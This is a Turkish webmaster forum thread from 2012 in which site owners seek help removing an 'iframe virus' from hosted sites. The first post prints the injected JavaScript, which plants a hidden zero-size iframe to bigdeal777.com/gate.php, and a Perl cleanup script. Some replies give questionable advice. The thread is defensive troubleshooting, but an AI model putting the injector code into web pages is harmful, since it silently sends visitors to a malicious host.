Giriş Yap / Kayıt Ol


Konuya Cevap Yaz
Seçenekler Stil
Geri Git   WM Aracı > Blogcular > WordPress
UkashSatinAl.com.tr
  #1  
Okunmamış 07 Şubat 2012, 19:37
Avatar Seçilmemiş
WM Aracı
 
Üyelik Tarihi: 03 Şubat 2012
Mesajlar: 5
Beğenilen Mesajları: 0
Beğendiği Mesajlar: 1
Ticaret: 0, 0%

Selam Arkadaşlar

yaklaşık 40 günden beridir sunucumdaki sitelerin hemen hepsi <iframe> virüsü ile tanışmış bulunmakta. Bu virüs ile ilgili olarak normal prosedürlerin hepsini yerine getirmeme rağmen, Sitemdeki Hit düşüşünün nedenlerini Araştırırken Google web master araçlarından önizleme yaptırdığımda getirme hataları arasında şu adrese denk geldim "http://bigdeal777.com/gate.php?f=977533&r". bununla ilgili kısa bir google araştırmasından sonra sadece .php .html dosyalarına değil .js dosyalarınada bulaştığını gördüm :S. olası bütün yazma izinlerini kaldırmış olmama ve ftp şifremi değiştirmeme rağmen halen daha sitemdeki dosyalara bulaşmış olması beni bir hayli ürküttü. bununla ilgili olarak bir başka platformda konu açmış olan bir arkadaştan alıntı yaparak olayı biraz daha açmak istiyorum.
konuyu açan "Cemaliozan" arkadaşımızında aynı sıkıntı başında sanırım. Kendisinin Affına Sığınarak aynen konuyu buraya atıyorum..

Alıntı:
Cemaliozan Adlı Üyeden Alıntı
Merhaba arkadaşlar ;

Godaddy de 9 yıldır sorunsuz çalışan 8-10 domaini bir arada barındıran Deluxe Hostum var. Root tan başlamak üzere tüm klasör ve dosyalarım salt okumaya (444) ayarlı. Muhtemelen FTP ile yüklediğim iframe virüsü bulaşmış bir dosya zaman zaman başta JavaScript dosyaları olmak üzere domainlere ayrı ayrı girip html,php ve javascript dosyalarını teker teker açıp, dosya izinlerini 777'ye ayarlayarak en son satırına aşağıdaki gibi eklemeler yapıyor.

PHP Kodu:
PHP- Kodu:
/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var 
e=new Date();e.setTime(e.getTime()+(2592000000));
if(!
g()&&window.navigator.cookieEnabled)
{
    
document.cookie='1=1;expires='+e.toGMTString()+';path=/';
    
window.setTimeout(function(){
        var 
JSinj=document.createElement('iframe');
        
//Bu adres satırı değişebiliyor
        
JSinj.src='http://bigdeal777.com/gate.php?f=977533&r='+escape(document.referrer||''); 
        
JSinj.width='0';
        
JSinj.height='0';
        
JSinj.frameborder='0';
        
JSinj.marginheight='0';
        
JSinj.marginwidth='0';
        
JSinj.border='0';
        try{
            
document.body.appendChild(JSinj);
        }catch(
e){
            
document.documentElement.appendChild(JSinj);
        }
    }, 
2000);
}
/*qpi*/ 
Tüm host dosyalarını lokale indirdim, kendi bilgisayarımda güncel bir kaç antivirüs ve malware ile taradım. Eklenmiş kodları temizleyip tekrar salt okunura ayarladım. Sağdan soldan alıpta kullandığım kod yoktur. Kodlarımın Bir kaç javascript kodu hariç tamamı bana aittir. Dolayısıyla içlerinde ne olduğunu iyi biliyorum. Veri tabanlarınıda olası bir script/code açığı bakımından kontrol ettim. Herhangi bir aksaklığa rastlamadım.

Yaklaşık 15 gündür internette aramadığım yer kalmadı, sonunda ftpchk3.php isimli bir trojan dosyasının benzer saldırılar yaptığını öğrendim. Bu dosya benim klasörlerimin hiç birinde yok. Godaddy sunucuları bu tür dosyaların bulaşmasına karşı gerekli önlemleri almışlar. (Bir kaç sefer adı ftpchk3.php olan içi boş dosya oluşturup denedim anında silindi.) Fakat her nasılsa benim sorunumu çözemediler.

Bu tip virüsün temizlenmesi ile ilgili olarak bir perl kodu buldum. Hem perl hem php bilgisi olan biri bu kodu php'ye çevirirse memnun olurum. Bu virüsle daha önce uğraşan arkadaşların konu hakkındaki yorum ve çözüm önerilerini bekliyorum.

PERL Kodu :
PHP Kodu:
PHP- Kodu:
#!/usr/bin/perl
# http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html
use strict;
`
grep -Rn aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u * | cut -d ':' -f 1 > listofinfected`;

open FP,"listofinfected";
my $file;
while(
$file = <FP>){
  print 
"Testing $file ... ";
  
chomp($file);
  if(-
($file)){
    
open VI,$file;
    
my @filecon = <VI>;
    
close VI;
    
    if(
$filecon[0] =~ m/aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u/){
      
      
$filecon[0] =~ s/(<\?.*?\?>)//g;
      
      rename($file,$file.".infected");
    
      open VI,">$file";
      print VI join('',@filecon);
      close VI;
      
      print $file." Fixed !!";
    }    
  }
  print "\n";
}

close(FP);

`grep -Rn ftpchk3.php * | cut -d ':' -f 1 > listofinfected2`;

open FP,"listofinfected2";
my $file;
while($file = <FP>){
  print "Testing $file ... ";
  chomp($file);
  if(-e ($file)){
    open VI,$file;
    my @filecon = <VI>;
    close VI;
    
    my $fc = join('',@filecon);
    $fc =~ s|document.write('<script(.*?)ftpchk3.php(.*)script>');||sig;
    $fc =~ s|<script[\s]+src="?http(.*?)ftpchk3.php(.*?)script>||sig;
    
  
    
    rename($file,$file.".infected");
    
    open VI,">$file";
    print VI $fc;
    close VI;
    
    print $file." Fixed !!";
  }
  print "\n";
}

close(FP); 
Kullandığım Sistem WP olduğundan ayrıca; genelde bu virüsün sadece .html ve .php dosyalarına bulaştığını varsayan arkadaşlardan edindiğim "eksik bilgi ile .js dosyalarına baktığımda da kod yapısının farklı olabileceği hiç aklıma gelmediğinden bugün bütün siteleri tekrardan elden geçirmekteyim. Önemle Uyarıyorum Bu virüs sadece .html ve .php yada .asp dosyalarına bulaşmıyor. yazılabilir bütün dosyalara bulaşıyor. .txt de dahil. Virüsü temizleyen arkadaşlar bütün dosyalara baksınlar..

Yukarıdaki Perl in işe yarayıp yaramadığını test etmedim. Perl in alındığı blogta
Nasıl Çalıştığı şu şekilde belirtilmektedir.

How to execute?

Copy paste the code to a file called anti.pl
From the terminal run
perl anti.pl

Burdan benim anladığım yukarıdaki perl kodlarını anti.pl olarak sunucu ana dizininde kaydetmemizi ve puty komut satırından cd /home/ anti.pl olarak çalıştırmamızı söylüyor. (yanlış anlamışta olabilirim bu yüzden denemedim). Benim Merak ettiğim Asıl soru şudu;

Arkadaşımızın Bahsettiği ftpchk3.php isimli dosya ile daha önce karşılaşan ve temizleyen oldumu? Zira kendi Pc imde 4 anti ve 2 malware tarayıcı ile taratığ zararlı görülen bütün dosyaları temizledim. FTP ve root şifrelerimin tamamını değiştirip Sadece manuel olarak giriş yapmaktayım. Fakat buna rağmen halen daha virüs sitelerimde aktif oluyor.

Bu konuda daha önceden bilgisi olan arkadaşların tavsiyelerini bekliyorum. Herkese iyi çalışmalar...
  #2  
Okunmamış 07 Şubat 2012, 20:04
Avatar Seçilmemiş
Üyeliği Durdurulmuş
 
Üyelik Tarihi: 21 Kasım 2011
Mesajlar: 300
Beğenilen Mesajları: 28
Beğendiği Mesajlar: 11
Ticaret: 3, 80%
Standart

sitenin yedegini indir iframe kodunu arat ayrıca echo da olabilir adamlar yönlendirme atmıstır sonra temizle ayrıca ftp programını sil yeniden indir
  #3  
Okunmamış 07 Şubat 2012, 20:16
depresan Adlı Üyenin Avatarı
WM Aracı
 
Üyelik Tarihi: 11 Aralık 2011
Mesajlar: 2.287
Beğenilen Mesajları: 571
Beğendiği Mesajlar: 227
Ticaret: 5, 100%
Standart

ftp programı olarak filezilla kullanın
cute ve diğer paralı yazılım crackleri virüslü olabiliyor
ftpnizde bütün siteleri kayıtlı tutmayın, virüs hepsine bulaşacaktır
işiniz bittiğinde ftpden adresleri silin, cookie hack ile pc nize virüs girmiş olabilir, hergün cokieslerinizi silmelisiniz, bu alemde herşeyi, birileri bişey yapmadan önce düşüneceksin, bi iş yaparken kaynklarının güvenli olduğunu sorgulayacaksın, her bulduğunu ftpye atmayacaksın
örnekler çoğaltılabilir
js lere ve diğer dosyalarına virüs sadece adı index ile başlayanlara girer
kendisini göstermek ister hack sayfası ya da alt sayfalar, engeller girişi o sayfaya, zaten virüslerin amacı da bu, index.php ni göstermemek
HasanAkdenz bunu beğendi.
ruhkanseri.com | weblios.com
  #4  
Okunmamış 07 Şubat 2012, 20:43
Avatar Seçilmemiş
WM Aracı
 
Üyelik Tarihi: 03 Şubat 2012
Mesajlar: 5
Beğenilen Mesajları: 0
Beğendiği Mesajlar: 1
Ticaret: 0, 0%
Standart

Alıntı:
universty21 Adlı Üyeden Alıntı Mesajı göster
sitenin yedegini indir iframe kodunu arat ayrıca echo da olabilir adamlar yönlendirme atmıstır sonra temizle ayrıca ftp programını sil yeniden indir
Normal Prosedür olarak kastettiğim zaten buydu bunları defalarca bütün sitelerim için uyguladım) ftp programını silip tekrar kurdrum..burada değinmek istediğim nokta PC de değil Sunucuda da bir dosyanın olduğu..

Alıntı:
depresan Adlı Üyeden Alıntı Mesajı göster
ftp programı olarak filezilla kullanın
cute ve diğer paralı yazılım crackleri virüslü olabiliyor
ftpnizde bütün siteleri kayıtlı tutmayın, virüs hepsine bulaşacaktır
işiniz bittiğinde ftpden adresleri silin, cookie hack ile pc nize virüs girmiş olabilir, hergün cokieslerinizi silmelisiniz, bu alemde herşeyi, birileri bişey yapmadan önce düşüneceksin, bi iş yaparken kaynklarının güvenli olduğunu sorgulayacaksın, her bulduğunu ftpye atmayacaksın
örnekler çoğaltılabilir
js lere ve diğer dosyalarına virüs sadece adı index ile başlayanlara girer
kendisini göstermek ister hack sayfası ya da alt sayfalar, engeller girişi o sayfaya, zaten virüslerin amacı da bu, index.php ni göstermemek
Görüşünüz için Teşekkürler.. Lakin Acemi biri değilim. Her Bulduğumu FTP ye atmak gibi bir huyum olmadı hiç) ve başından beridir filezilla kullanmaktaydım. Host verdiğim birinin üzerinden bana bulaştı die tahmin ediyorum zira cute ve türevi FTP programlarına ihtiyaç duymadım hiç. sorunum şuki bu virüsün makinede ftpchk3.php veya türevi bir dosya oluşturmuş olabileceği ihitmaline karşı daha önce karşılaşan arkadaşlardan bilgi almaktır.
  #5  
Okunmamış 07 Şubat 2012, 20:45
melankolia Adlı Üyenin Avatarı
Trapindir.com
 
Üyelik Tarihi: 17 Haziran 2011
Yaş / Cinsiyet: 21 / Erkek
Mesajlar: 2.112
Beğenilen Mesajları: 341
Beğendiği Mesajlar: 1673
Ticaret: 1, 100%
Standart

Arkadaşlar ben düzenli olarak her hafta wordpress dosyalarının yedeğini alıyorum mesela şimdi benim wordpress dosyalarına iframe virüsü bulaşsa temiz dosyalarla değiştirsem virüslerde temizlenmiş olurmu acaba
Gözlerin bir adım öteyi görmüyorken körleri neyle yola getirme sevdasındasın ?
  #6  
Okunmamış 07 Şubat 2012, 20:47
Avatar Seçilmemiş
Üyeliği Durdurulmuş
 
Üyelik Tarihi: 24 Kasım 2011
Mesajlar: 168
Beğenilen Mesajları: 219
Beğendiği Mesajlar: 6
Ticaret: 0, 0%
Standart

Geçenlerde benim siteyede bulaştı.. index ve js dosyalarının tamamına bulaşıyor.. Ve çoğu antivirüs programıda güvenlik sebebiyle siteye girdirmiyor kullanıcıları.. Kullanıcılar öyle söylemişti oradan biliyorum Yapman gereken basit.. Tüm index ve .js uzantılı dosyalarını açıp tek tek temizlemek.. (bunun için programda var diye biliyorum).. FTP şifrelerini başka bir bilgisayardan değiştirmek ve mevcut bilgisayarına bir format atmak.. Format ne için diye soracak olursan bu normal iframe virüsünden biraz daha zararlı bir virüs çeşidi.. Bunuda bir bilen söyledi bizzat bana, bu yüzden dediklerimi dikkate almalısın.. Ve ftp programlarına aldırma, ben FileZilla kullanıyorum şaşmamda.. Bir sorun olmadı bugüne kadar. Umarım çözersin sorunu

Not: ben bu yolla çözdüm, bir sorunum yok şimdi çok şükür
  #7  
Okunmamış 07 Şubat 2012, 21:52
depresan Adlı Üyenin Avatarı
WM Aracı
 
Üyelik Tarihi: 11 Aralık 2011
Mesajlar: 2.287
Beğenilen Mesajları: 571
Beğendiği Mesajlar: 227
Ticaret: 5, 100%
Standart

o virüs aslında sql e bulaşmaz
sadece sql yedeği alıp en önemli sitelerinden başlayarak siteyi terminate etmek mantıklı çözüm gibi geliyor bana
ruhkanseri.com | weblios.com
  #8  
Okunmamış 07 Şubat 2012, 23:13
Avatar Seçilmemiş
WM Aracı
 
Üyelik Tarihi: 03 Şubat 2012
Mesajlar: 5
Beğenilen Mesajları: 0
Beğendiği Mesajlar: 1
Ticaret: 0, 0%
Standart

Arkadaşlar Sitelerden Temizliyorum zaten ve temizledimde
temiz PC den gerekli işlemleri yapmış bulunmaktayım zaten. Zira Bu virüsün PC vasıtasıyla FTP deki şifreleri virüs coder e göndererek gerekli kodları entegre etmeye yardımcı oluyor. bunun mantığını zaten biliyoruz.

Asıl merak ettiğim bu virüs ün SERVER de yuvalanamabilme ihtimali? yani Serverde de aynı pc deki gibi bir bir log dosyası oluşturarak coder e bilgi gönderip alması mümkünmüdür? ve mümkünse bunu yukarıdaki perl veya benzeri başka bir yazılım ile SERVER den temizleme şansımız nedir?

çünkü bütün işlemlerimi Temiz PC den yapıyorum. diğer pc ye format attım ve genede emin olmadığımdan dolayı diğer pc yi FTP işlemlerimden kullanmıyorum. FTP şifrelerini değiştirmeme rağmen bazı .php .html ve .js dosyalarının yazma izni değişmiş ve kod yeniden bulaşmış olarak karşıma çıkıyor:S

Bunun illaki bir şekilde temizleme olayı vardır.. Sorun diğerlerinden biraz farklı anlayacağınız:S

Konu byleo tarafından (07 Şubat 2012, 23:16 ) değiştirilmiştir.
  #9  
Okunmamış 10 Şubat 2012, 20:25
Avatar Seçilmemiş
WM Aracı
 
Üyelik Tarihi: 03 Şubat 2012
Mesajlar: 5
Beğenilen Mesajları: 0
Beğendiği Mesajlar: 1
Ticaret: 0, 0%
Standart

arkadaşlar herkes sanırım ftp den temizledim pc ye fotmat attım bitti die bakmıyor konuya. bunun birde server yönü var ben bunu araştırıyorum. denemek için 2 gün önce; daha önceden temzilediğim yedekleri 3. ve sıfır pc den upload ettim sunucuya. ve bugün gene karşılaştım. kafayı yedirecek bana. en sonunda sunucuya format atıcam komple:S
  #10  
Okunmamış 11 Şubat 2012, 22:02
Melek Adlı Üyenin Avatarı
WM Aracı
 
Üyelik Tarihi: 09 Aralık 2010
Yaş / Cinsiyet: 24 /
Mesajlar: 749
Beğenilen Mesajları: 236
Beğendiği Mesajlar: 253
Ticaret: 1, 100%
Standart

Aynı konu banada bela oldu.. Bilmem kaç hafta oldu virüsü temizliyorum nerden giriyor anlamış değilim şuan görünürde dosyaları taratıyorum hiç bir şey bulmuyor.. Ama az önce siteye girişte chromede bu site zararlıdır uyarısı verdi. Napcam bilmiyorum ftpyi komple temizleyip sql yedeği ile baştan kuracağım sanırım. Bu virüs 2dir başıma bela sağolsun
Konuya Cevap Yaz

Konuyu toplam 1 kişi okuyor. (0 üye ve 1 Ziyaretçi)
 
Seçenekler
Stil
Normal Normal

Benzer Konular
Konu Konuyu Açan Forum Cevap Son Mesaj
İframe Virüsü ve İframe Virüsünden Kurtulma BlackCat Bilgi Arşivi 1 25 Temmuz 2012 02:52
Facebook'a Ulaşabiliyor musunuz tam olarak ArtemisTr Konu Dışı 15 02 Şubat 2012 22:13
İframe Virüsü Yardım Yrlmz Yeni Başlayanlar 0 24 Ocak 2012 21:22
FTP Malware Virüsü Temizleme Beyaz WordPress 4 26 Ekim 2011 01:58
Bunlar Tam Olarak Ne Olabilir? NovaCep Konu Dışı 9 18 Temmuz 2011 22:03

Geri Git   WM Aracı > Blogcular > WordPress


Yetkileriniz
Konu açma yetkiniz: Yok
Cevap Yazma Yetkiniz Yok
Eklenti yükleme yetkiniz: Yok
Mesajınızı değiştirme yetkiniz: Yok

BB code: Açık
İfadeler: Açık
[IMG] Kodları: Açık
HTML kodu: Kapalı



WM Aracı Maskotu Boa WM Aracı © 2010 - 2014
WM Aracı tescilli bir markadır.
Cesur.NETWM Aracı Cesur.NET İnternet Teknolojileri'nde güvenle barınmaktadır.
Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 09:37.